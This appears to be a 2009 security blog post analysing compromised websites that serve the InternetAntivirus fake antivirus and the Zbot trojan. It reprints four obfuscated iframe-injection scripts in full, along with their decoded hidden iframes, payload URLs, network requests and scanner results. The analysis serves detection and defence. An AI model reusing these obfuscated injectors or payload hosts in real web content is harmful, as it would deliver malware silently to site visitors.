Thursday, February 19, 2009

Compromised websites spread InternetAntivirus: January - February, 2009

Web Poisoning: Iframe injection + PDF Exploit / Trojan-Spy.Win32.Zbot + InternetAntivirus

Malicious code inserted:

<!-- ad -->
<script>
osoem=(4e0,190);
johbc=(9e0,1909);
arnrb=(65.,""+"a"+"m"+"e");
vpkgs=(0x826," ");
oymzl=(1.89e2<=656?"":5.);
oozuk=(0x44>6?"17":2.934e3);
aivuk=(4e0,""+".");
rjreh=(5.4e1>0.3?"":.5);
mnswd=(414>6.17e3?70.:"9");
zlits=(5.5e1>1.5e1?".":46.);
wlpwa=(9,"93");
dmdcw=(1e1<.6495?278.:"las");
bthvu=(0.900,"r");
xwjcg=(0x4,"yl");
wxvoe=(0.64<=0.1?.9:""+"i"+"s"+"");
wafzv=(646>8.39e2?9518:"i");
jfazq=(0x685>=8e1?""+"b"+"i"+"l"+"":4.3e1);
ernzk=(.840>=2.?53.:"i"+"t"+"y"+"");
yfnul=(8.51e2,":");
skxws=(.448,"");
vyrje=(0x6,"<");
kylrc=(59,"/i");
zllcn=(8483,""+"a"+"");
oxynx=(9.6e1,""+"m"+"e"+"");
elbis=(0x66<2002?"r":0x547);
slnat=(7.07e2,"");
onlvz=(9e0<0x54?"='":58);
bljji=(6.,"ht");
oowax=(9.3e1<=4?835.:"tp");
vafut=(93>634.?6157.:":/");
hswsd=(.3>=6.?33.:"");
bwtwu=(0.9,"o");
efesv=(0.8,"/");
nczim=(8166>=3.495e3?"=":0.7);
kkkka=(0x93,"2");
btqpy=(.6," ");
yxjvl=(9.,""+"");
myfsk=(7,"");
qcevo=(0x2<.350?.4:"h");
lmiph=(.1055>=0.92?0.8:"i");
fgjfd=(329,"d");
onjpi=(9.84e2<=854.?0.7687:"e");
ypdfc=(0.65<=42.?" "+"":.8318);
claug=(0x3590,">");
lpcpn=(7.7e1,"");
nhbvb=(2,""+">");
flrft=(0x9,5);
irhwk=((93<=9893?.711:3)<=(0.9>=9.4e1?.569:3.692e3)
?(.3<=1.2e1?osoem:2.21e2):
(4.>.3?.6:0.31));
fyatw=((973.,0.5e1)<(3928.,.7689)?(5<=.532?.696:2e0):
(5e0,johbc));
nwyro=((7e0>=8.?3869.:0x2),(5.91e2>=0.957e3?0x2110:
arnrb)+(0.5e1,vpkgs)+
(.830>=9.8e1?.533:oymzl));
xwuua=((7e0>=82.?.9357:7.),(1983.>=20.?"85"+"."+"":
8352)+(6.35e2<0x2?0x83:oozuk)+
(1.2e1>0x4843?56:aivuk));
kzxos=((.3727,5.06e2),(.727,rjreh)+(91,"1"+"3")+(6849.,
mnswd)+(15.,zlits)+(4>.336?""+"1"+"":.2)+
(0.68,wlpwa)+(.79,"/")+(.136,dmdcw)+(0x4<.5?.4:"the")
+(6,bthvu)+(2.,""));
kxotj=((3.08e2,0.7310),(0x2,xwjcg)+(7e0<=7.269e3?"e
=":5.106e3)+(2.,""+"'"+"v"+"")+
(0x4<6e0?wxvoe:0x7616)+
(.9511<=0x5251?wafzv:0.1902)+(2.807e3>2.1e1?jfazq:
0x2)+(5588.>=2.?ernzk:8.11e2)+
(781>=0.2435?yfnul:67)+
(.82,skxws));
xynhe=((.58,1.266e3),(33>0x32?0x4312:vyrje)+(.6084
<=957?kylrc:0x2769)+(0.63,"fr")+
(2e0,zllcn)+(6.,oxynx)+(426,""));

aaa=(((61>=0.7?4870:178)>=(3.78e2>=0x5?7.709e3
:6.427e3)?(0x1985,9389):(6e0,.825)),((0.229e3>
=69.?4.562e3:3132)<=(66<=0x3?7e0:0x229)?(5217.
,5e0):(376.>7.86e2?6.5e1:document)))[(((.82,0x6)
<=(8130,.7246)?(4.7e1<.551?2:0.991):(0x9688>=78
1.?0.31:5.04e2)),((7.1e1>=.1?.29:3.8e2),(382,"w")+
(9865>=.2?elbis:13)+(.152>=0x452?0.363:""+"it"+"")
+(5.<=8.1e1?"e":0x35)))]((((.6209,6193.),
(1.2e1>=9?irhwk:2.89e2))<((.70,.768)>(5.>=.8447?
0x27:681.)?(9870,96.):(454,fyatw))?((0x5<7852?
.16:0.4)<=(1e0>1.173e3?0x9967:.3)?(0.3,"<ifr"):(.81
2<27.?58:1e0))+((53.<=29.?1194.:0x9563),(0x961,
nwyro))+((1631>88?0x578:7e1)>=(79>=.44?0x107:
6.07e2)?(.6,slnat)+(5.94e2,""+"s"+"")+(7.21e3>5e0?
""+"r"+"c"+"":0.509e3)+(84.<=185.?onlvz:193)+(.2
02,bljji)+(5.6e2<3365.?oowax:1.8e1)+(338.<738.?v
afut:0.5e1)+(0.1e1>=.21?"/":9e0)+(4.5e3>=1?hswsd
:.573):(.3<.272?60.:0.1))+((0x6,7.5e1),(986.<=36.?
6.3e1:xwuua))+((256>=57.?.89:8e0),(13.>0x76
43?216.:kzxos))+((0.183>1?.20:.5705)<=(27>=3e
0?.909:39)?(6506.,"")+(.794>=0.2?bwtwu:0x66)+(.3
9,"1")+(3.03e3,efesv)+(7.2e1>=0x79?0.202:"?")+(0x
83,"t")+(0.3e1,nczim)+(1538.<=228.?0.9e1:kkkka)+
(0.768>374.?348.:"'")+(1606.,btqpy)+(7.212e3,"s")
+(0x8619,"t")+(3.>0x2864?8957:yxjvl):(.756>1221.
?932:6.672e3))+((653.,8.07e2)>=(.95<2.4e1?4e0:
554)?(0x6291,kxotj):(4.9e1,9.))+((263<6.423e3?53.:
8.24e2),(4>=0.13?myfsk:.6)+(238<0.6?0x37:qcevo)+
(.984>=0x2261?2.052e3:lmiph)+(.94,"d")+(7.845e3
>=5?fgjfd:.294)+(4e0,onjpi)+(4872.,"n")+(0.3754>.
4?533:"'"+"")+(0.794e3>9487.?4.8e1:ypdfc)+(5374
.,claug)+(5.9e1,lpcpn))+((0.90,408.),(0x2<=5.041e3
?xynhe:0x3))+((2.<1.328e3?377.:8e0)<(2.58e2,1e0
)?(0x826<.4?0x436:.1):(4.2e1<8?0.88e2:nhbvb)):((
5901>=.8159?flrft:9e0),(.4,8.933e3))));

</script><!-- /ad -->

 
Result:
 <iframe src='hxxp://85.17.139.[BLOCKED]193/lasthero1/?t=2' style='visibility:hidden' ></iframe>
  
Detected on:
  February 12 by http://www.malwaredomainlist.com/mdl.php?sort=Date......
  February 12 by http://forum.malekal.com/viewtopic.php?f=62&t=17311
  
Virustotal Analysis on 2009.02.12 09:55:10 (CET):
 2/39 (5.13%)
 Ikarus T3.1.1.45.0 2009.02.12 Exploit.Win32.Pdfjsc
 a-squared 4.0.0.93 2009.02.12 Exploit.Win32.Pdfjsc!IK
  
Virustotal Analysis on 2009.02.12 09:59:40 (CET):
  
 Avast 4.8.1335.0 2009.02.11 Win32:Fabot
 eSafe 7.0.17.0 2009.02.11 Suspicious File
 Data 19 2009.02.12 Win32:Fabot
 Symantec 10 2009.02.12 Suspicious.MH690.A
 TrendMicro 8.700.0.1004 2009.02.12 PAK_Generic.001
  
 http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99


Other Malicious code inserted:

<!-- ad --><script>
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv="write";
mzsrv="me";
zqfqw="et";
gdtrk="/' st";
rpiia="yl";
qxaol="";
ldlvw="i";
zfhuu="ty";
hvkhb=":h";
hbqmm="d";
hauzn="";
zdqdp=4;
sjgbi="if";
rpygo="r";
syjnh=" sr";
rwanv="c";
elujl="=";
hrgnc=863;
akzpp=8853;
tplxn=" ";
cvtot="</";
qtndm="";
jlooz=3953;
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv="write";
mzsrv="me";
zqfqw="et";
gdtrk="/' st";
rpiia="yl";
qxaol="";
ldlvw="i";
zfhuu="ty";
hvkhb=":h";
hbqmm="d";
hauzn="";
zdqdp=4;
sjgbi="if";
rpygo="r";
syjnh=" sr";
rwanv="c";
elujl="=";
hrgnc=863;
akzpp=8853;
tplxn=" ";
cvtot="</";
qtndm="";
jlooz=3953;
gftzo=(9.007e3>=5e1?uyimh:qxcxg);
jjaqh=(ddytx>.2438?xkjpv:3.);
gmbpt=(7.3e1>=36?mzsrv:.45);
zxtsi=(323,zqfqw+gdtrk+rpiia+"e='"+"v"+"isib");
hzpmf=(0x587,qxaol+ldlvw+"li"+zfhuu+hvkhb+"id"+hbqmm+"en"+"'"+hauzn);
rmtyf=(6.5e1,"");

aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.
8188?0x816:.5486):(.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,""+"<"+
sjgbi+rpygo+"a")+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+"'"+"h"+"ttp"+"")
+(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,zxtsi)+(hrgnc>=akzpp?9.909e
3:hzpmf)+(69<38.?0.249:tplxn+">"+cvtot+"if"+qtndm)+(2.>1.?"ram"+"e>"
:64.)+(223.>=jlooz?1.:rmtyf)));</script><!-- /ad -->

  
 
Result:
 IFRAME is inserted into compromised webpages
  
 <iframe src='hxxp://truittbros.net/' style='visibility:hidden' >
</iframe>
<iframe src='hxxp://idealadvertising.org/clicksagent/?...'
style='visibility:hidden' >
</iframe>

idealadvertising.org has been created February 5, 2009 (Registrar: Joker.com)

Same suspicious ip 85.17.189.183 (hosted by LEASEWEB - Netherland)
  
Payload detected by using the IP:
  
 85.17.189.183/clicksagent/?h=17h 200 Found
  
Result:
  
 MS-DOS executable PE for MS Windows
  
Virustotal Analysis:
  
 File install.exe received on 02.19.2009 00:14:46 (CET)
Result: 7/39 (17.95%)

 http://www.virustotal.com/analisis/33723c307ee9548f4150a30a0679a62b
  
  File Size: 47,104 bytes
  
ThreatExpert Analysis:
  
 http://www.threatexpert.com/report.aspx?md5=dadb6a147a831902e20
62666e045a418

http://www.threatexpert.com/threats/trojan-win32-internetantivirus.html
  
Alias:
  
 Trojan.Win32.InternetAntivirus [Ikarus]
  


Malicious code inserted:

<!-- ad -->
<script language="JavaScript">
function rkfg(jflq){
return String.fromCharCode(jflq);
}
var ohhe="060105102114097109101032115114099061039104116116112058
04704711511711210111410511111409710012204610511010211104711111
21051150470631160610490510390321191051001161040610390480390321
04101105103104116061039048039032115116121108101061039118105115
10509810510810511612105803210410510010010111005903906206004710
5102114097109101062";
var ifdm="";
for(qhxk=0;qhxk<ohhe.length;qhxk+=3){
ifdm+=rkfg(ohhe.substr (qhxk, 3));
}
window.status='Done';
document.write(ifdm);
</script>
<!-- /ad -->
  
 * random letter
 
Same malicious code inserted:

<script language="JavaScript">
function pwby(yyiu){
return String.fromCharCode(yyiu);
}
var trsl="060105102114097109101032115114099061039104116116112058
04704711511711210111410511111409710012204610511010211104711111
21051150470631160610490500390321191051001161040610390480390321
04101105103104116061039048039032115116121108101061039118105115
10509810510810511612105803210410510010010111005903906206004710
5102114097109101062";
var mpsq="";
for(hwrv=0;hwrv<trsl.length;hwrv+=3){
mpsq+=pwby(trsl.substr (hwrv, 3));
}
window.status='Done';
document.write(mpsq);
</script>
  
Result:
 <iframe src='hxxp://superioradz.info/opis/?t=13' width='0' height='0' style='visibility: hidden;'>
</iframe>
  
Analysis:
 http://www.threatexpert.com/report.aspx?md5=95c04992bf14769fbd1b7b0ada9b9e87
  
  
HTTP Requests:
  
 hxxp://85.17.189.183/opis/?6e53cb91d272691ff1f03316b4e40fe897304252d0b05b1
c33d58155a3825e960ee3a527ad0f3b81a23df2c7d43150e96be9dca7a6e59d3f4d816
ff4a5122e8f
 hxxp://85.17.189.183/opis/?8fbe2b5fa4842f6f0fe51f024732e6b290ef4e487d3779dc2
d10d646083af5315a0c295b173c9074618dc04b42ade64ca0abd171ed2dcd203721fc9
bdd89aba3
 text/html (JavaScript)
  
Javascript Analysis:
  
 http://wepawet.iseclab.org/view.php?hash=ca172b3a2297a76af1183181cba4249a&t
=1234983863&type=js
  
Virustotal Analysis: VT: 1/39 (2.71%)
  
 http://www.virustotal.com/analisis/df3279de33cdf24699004ab05ef61d13
  
Alias:
 JS/Xilos [Microsoft]
  
  
HTTP Requests:
  
 hxxp://85.17.189.183/opis/?35c0378e5af230cb06d1aef60e9d313999fb02e0230541
0fd4357d45f884bd55584e963ddeeb3e2010d55b1bc73920171042005b87c96f99cb
9b3820d28f4413
 application/x-shockwave-flash (swf - Shockwave Flash File)
  
  
Result:
 MS-DOS executable PE for MS Windows downloaded
  
 hxxp://85.17.189.183/opis/?h=17
  
 File name: a.exe
File Size: 8704 Bytes
  
ThreatExpert Analysis:
  
:http://www.threatexpert.com/report.aspx?md5=8d82c411cb3748dfefcbd4277db7fbfd
  
Virustotal Analysis:
  
 File a.exe received on 02.18.2009 14:11:35 (CET)
Result: 5/39 (12.82%)

http://www.virustotal.com/analisis/a1bee09c6dd5cf3dbd890a4b777156b2
  
 File a.exe received on 02.19.2009 00:14:46 (CET)
Result: 7/39 (17.95%)

http://www.virustotal.com/analisis/4e0e89411f8cfb49482553319d080e38
  
Alias:
  
 Suspicious.MH690 [Symantec]
 TrojanDownloader:Win32/Obitel.gen!A [Microsoft]
  
 http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99
  
  
Analysis: First infection:
  
  
HTTP Requests:
 85.17.143.203:80 - [banksguard.com]
  
 GET /pics/ncr.exe
  
 File name: ncr.exe
 File Size: 61952 Bytes
  
Alias & packer info:
  
 Troj/Inject-EF [Sophos]
 Trojan.Win32.Zbot [Ikarus]
 packed with: PE_Patch [Kaspersky Lab]
  
ThreatExport Analysis:
  
 http://www.threatexpert.com/report.aspx?md5=5d074816dc6625fcd8df4c8f7dce992b
  
Iseclab Anubis Analysis:
  
 Ikarus Virus Scanner - Trojan.Win32.Zbot (Sig-Id:454183)
 http://anubis.iseclab.org/?action=result&task_id=14fd198d4506042d4c901eed512f5f33
8&format=html
  
Virustotal Analysis:
  
 File ncr.exe received on 02.18.2009 20:05:49 (CET)
Result: 11/39 (28.21%)

http://www.virustotal.com/analisis/2bcb0d524cf1e0524997077667c93963
  
 File ncr.exe received on 02.19.2009 11:55:07 (CET)
Result: 14/39 (35.9%)

http://www.virustotal.com/analisis/e1721fe1408999bfb71f97e749fa1b17
  
 mcenspc.dll
  
 http://www.threatexpert.com/files/mcenspc.dll.html
  
  
  
Analysis: After first infection:
  
  
HTTP Activity:
 85.17.143.203:80 - [banksguard.com]
 Request: POST /pics/receiver/online
  
Anubis Iseclab Analysis:
  
 http://anubis.iseclab.org/?action=result&task_id=14fd198d4506042d4c901eed512f5
f338&format=html
  
  
Detected on:
  
  February 12 by http://secuboxlabs.fr/
  February 12 by http://www.malwaredomainlist.com/forums/index.php?topic=2550.0
  February 12 by http://forum.malekal.com/viewtopic.php?f=62&t=17311
  February 15 by http://www.malwaredomainlist.com/mdl.php?search=superioradz.info
  
 The domain superioradz.info has suddenly disapeared
(ns lookup failed)and the folder has been deleted/renamed.

Other Malicious code inserted:

<!-- ad -->
<script>
qedla=(6.,285);
rkkfh=(47>.7?"":.6461);
vqsqr=(7628,"r");
eazri=(580>=0x61?"":9.15e2);
lfhmf=(4.43e2,"de");
fxzlv=(0x62,""+"l"+"a"+"d"+"");
jhcfl=(172.,"si");
osdjh=(.7,""+"n"+"");
riwhq=(.90,""+"");
urrox=(1.1e1,"");
lpzjx=(502.<0x32?58:"e>");
mqbwp=(.87,1185);
mwpwc=(366>.225?"":0x223);
vwlum=(.5991,"<");
kviru=(.4>=6?0x518:"s");
zqfbo=(66.,"r");
lwsau=(1,"t");
xqwee=(8.39e2>0x4149?536.:""+"");
mwztz=(3,""+"c"+"k"+"");
bonre=(89.<=.5773?.7:""+"a"+"");
qzdhg=(3.3e1<=6?4586:"g");
pjrjp=(388,"e");
wueyt=(0x75>0.6?"/":0x6);
yxmzd=(857,""+"t"+"");
sbkom=(2.96e2,"=");
bmwzz=(2.2e1,"2");
mvlil=(0.2>=0.919e3?.875:""+"'"+"");
hibed=(.7882<0x80?"yl":0x8300);
jspxp=(4.124e3,""+"e"+"="+"");
tkrie=(7,""+"'"+"v"+"");
wzpci=(61.<0x807?"s"+"i":1e0);
epeqe=(5.915e3,"bi");
nlydk=(5.821e3<=0x6?5e0:"t");
lodri=(8e0,":");
gsbcm=(6.8e2<=34.?0x4652:"");
yljdx=(.8,"idd");
ralhl=(1e0,"n' >");
dwiyy=(9990,"<");
fxuin=(0x91<=710.?"m":8e0);
cqgjk=(6e1,6);
xddte=((6.76e2,0.165)>=(0x4<81.?38.:6)?(1e0>614?1e0:0.5110):(9e0,qedla));
plwqh=((7>=.2310?.3:141.)<=(0x3713,.92)?(7666.,rkkfh)+(0.9,vqsqr)+(0.457
<.3?2:eazri):(.4<9?3.:979));tpghb=((0.8789>=4.?1e0:48.)<=(1121,40.)?(95.
<=0x88?9.5e1:.6):(46.<=.4?793:""));ajyne=((9.52e2<=0x4?0.6e1:0.994)>
(0x5249,0.6)?(6.3e1,"")+(285>=.2850?lfhmf:0x6)+(0x82,""+"a"+"")+(.831,fxzlv)
+(77.,"v"+"er")+(10.,"ti")+(5.94e2<=7.4e3?jhcfl:.5)+(6e2,osdjh)+(7.8e1
<0x8?1.64e2:"g.")+(0.9,""+"o"+"r"+"")+(0x5,"g"):(7.1e1<0x15?4e0:0.75e2));
vpxsa=((.63<=.2?0.5:.258),(4e0,riwhq)+(74.,"/"+"cl"+"i")+(2.365e3>=0.5?
urrox:6.));abflo=((0.428<=.7314?4.:2288)>(76.,.441)?(0.6,lpzjx):(2.746e3
<3518.?0x5662:0x738));

aaa=(((0x17,4.471e3),(3e0>8?0.93:23.)),((.1<0x738?6407:.87),(35.<=
3804.?document:61)))[(((.2816,0.5)<(9.792e3,73.)?(.85,4e0):(975,0x8))>=
((0.51,0x53),(7.803e3>.9638?0x647:823.))?((2.>=0.8597?9e0:.1),(6.>=3
?xddte:1.89e2)):((.627>=0.790?83.:mqbwp),(7e0,mwpwc))+((6e0,0.2687)
,(.177,""+"w"+""))+((9.9e2<0.9e1?0x66:1e0)>=(3.404e3>8858?5279.:
0x5666)?(0.702,0x2):(2.<=9654.?plwqh:0x4337))+((3.,0.26e2)<=(5,.48)
?(0x3116,0.9):(3.11e2,"i"))+((0x3584<=656.?0x402:0x6)>=(36,27.)?(.63
,35.):(49<70.?"t":2.))+((37.>.976?0.8:4e0)>(4398.>=59?4.:0x1)?(628.>
2353.?1.:.6779):(.1618,"e"))+((840>=55.?3.:96)<(.4008,0x5)?(9398.>=
0x99?tpghb:269):(0.77e2,3.817e3)))]((((0.133<=0x402?6e0:.91),
(0x7201,213.)),((.419,0.511e3),(6.361e3,vwlum)+(.168<=3?"ifra":0x8)
+(3e0,"m")+(9.74e2>=6.643e3?7.7e1:"e ")+(.461>=0x465?1:kviru)
+(.7282,zqfbo))+((.4108,0x414)>(0.6148>=.50?0.834:98)?(0x87>=
0x4716?27.:""+"c"+"="+"'"+"h"+"t"+""):(9<40?0x27:.66))+((0x10,0x69),
(3.534e3>0x8?lwsau:0.6865)+(.5,"p:")+(0x27>=0x5755?7e0:"//i")+(0.6,""))
+((0x8>.3887?.3794:2e0),(2009.,ajyne))+((.37<68.?7.:6.2e1)>(0x7,2698)
?(23.<=9.657e3?4e0:6.51e2):(0x4968,vpxsa))+((4.>.83?0x7:2.73e2)<=
(4.729e3<=.2?7e0:0.224)?(4.9e1<.61?0x7:.53):(3.62e2,xqwee)+(2.996e3,
mwztz)+(0x82>=0x3?"s":0.4666)+(0x145<1?.775:bonre)+(0.755,qzdhg)+
(0x129>=684?.887:pjrjp)+(0.636<0.4323?4e1:"nt")+(9e0,wueyt)+(0x377>
=.5?"?":90.)+(0x424>0x25?yxmzd:0.2562)+(4.3e1,sbkom))+((3706,0x1)
,(0x7863,bmwzz)+(9552<0x1?6.611e3:mvlil)+(.5085>1.86e2?0.102:" s")
+(3<62?"t":.2)+(0.90>2.74e2?8e0:hibed)+(.64>=6472?2.335e3:jspxp)
+(545.<=565.?tkrie:7.178e3)+(0x528>2977?9.:"i"+"")+(0.3,wzpci)
+(5589,epeqe)+(0x333<=74?.768:"l")+(596<=2?6784:""))+((0.9,34.),
(70.,"")+(6377>=2.086e3?"i":0x4464)+(.161,nlydk)+(8e1<.510?7446:"y")+
(0x2<=41.?lodri:25.)+(9.,gsbcm))+((0.91>=.5?.67:697.),(97.>1?""+"h"+"":62)
+(96.,yljdx)+(7e0<5.47e2?"e":5e0)+(0x52,ralhl)+(0.19>=.580?8:dwiyy)+
(0.037e3>.698?"/"+"if"+"r"+"a":39.)+(9,fxuin))+((0x3397,cqgjk)<=
(0.5236<=374.?5e0:0.4)?(8.059e3>8794?4.56e2:4.314e3):(.2562,abflo))));

</script><!-- /ad -->

  
 
Result:
 IFRAME is inserted into compromised webpages
  
 <iframe src='hxxp://idealadvertising.org/clicksagent/?t=2' style='visibility:hidden' ></iframe>
<iframe src='hxxp://idealadvertising.org/clicksagent/?...'
style='visibility:hidden' >
</iframe>

idealadvertising.org has been created February 5, 2009 (Registrar: Joker.com)

Same suspicious ip 85.17.189.183 (hosted by LEASEWEB - Netherland)
  
JavaScript Analysis:
  
 http://wepawet.iseclab.org/view.php?hash=45d3...
  
JS Obfuscated Code:
  
 hxxp://idealadvertising.org/clicksagent/?t=2
 hxxp://idealadvertising.org/clicksagent/?075c.....
 hxxp://idealadvertising.org/clicksagent/?6cb.....
  
Network Activity:
  
 81.2.253.206:80 - [www.sprinterkiado.hu]
  
 Request: GET /index.php?session_id=57972&user_id=0&screen=8
  
 195.70.32.221:80 - [c.hu.tipptop.com]
  
 Request: GET /cgi-bin/?id=3608&c=LPmcnYzL&h=1
  
 85.17.189.183:80 - [idealadvertising.org]
  
 Request: GET /clicksagent/?t=2
  
Result: MS-DOS executablePE for MS Windows:
  
 hxxp://85.17.189.183/clicksagent/?h=17h

File name: ncr.exe
File Size: 8704 Bytes
  
Iseclab Anubis Analysis:
  
 http://anubis.iseclab.org/?action=result&task_id=12d602...
  
VirusTotal Results: 7/39 (17.95%):
 
 http://www.virustotal.com/analisis/33723c307ee9548f4150a30a0679a62b
 Analysed on 02.19.2009 00:14:46
  
Alias:
  
 http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99&tabid=2
 Suspicious.MH690.A [Symantec]